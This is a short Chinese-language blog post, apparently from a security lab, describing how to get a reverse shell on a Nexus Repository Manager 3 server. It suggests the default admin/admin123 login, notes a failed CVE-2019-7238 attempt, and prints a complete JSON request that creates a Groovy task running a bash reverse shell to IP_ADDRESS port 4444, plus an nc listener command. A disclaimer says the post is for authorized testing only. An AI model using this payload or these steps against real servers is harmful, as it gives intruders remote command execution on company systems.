Nexus3之ReverseShell

2020-03-10 18:27:09 浏览数 (1)

本次仅为学习交流,请遵守《中华人民共和国网络安全法》,勿用于非授权测试,如作他用所承受的法律责任一概与作者无关。

nexus系统是存在于各大企业里十分常见,均为nexus2/3

授权测试:

常见登录默认账号密码为admin/admin123(一般都能登陆进去)。

直接搜寻找nexus3 rce poc进行锤击,百度一波下载CVE-2019-7238命令执行按照它打打打

这里贴了一个没有写ip的包~其实是失败的,那个包找不到了。

执行完第一步之后返回true,但是第二步返回500未成功

发现该rce原来是版本并不管用,

而我的系统确实安全版本15

尝试使用ReverseShell来进行拿shell

填上然后抓包修改

发送Poc

```

{"action":"coreui_Task","method":"create","data":[{"id":"","typeId":"script","enabled":true,"name":"ReverseShell","alertEmail":"","schedule":"manual","properties":{"language":"grovy","source":"['/bin/bash','-c','/bin/bash-i >& /dev/tcp/IP_ADDRESS/4444 0>&1'].execute()"},"recuringDays":[],"startDate":null}],"type":"rpc","tid":22}

```

填上ip和监听端口:/IP_ADDRESS/4444

成功发生包后任务会出现刚刚我们发送的ReverseShell任务

直接run启动该任务

使用nc进行监听

nc -lvp 4444

手握日月摘星辰,安全路上永不止步。

- Khan攻防安全实验室

0 人点赞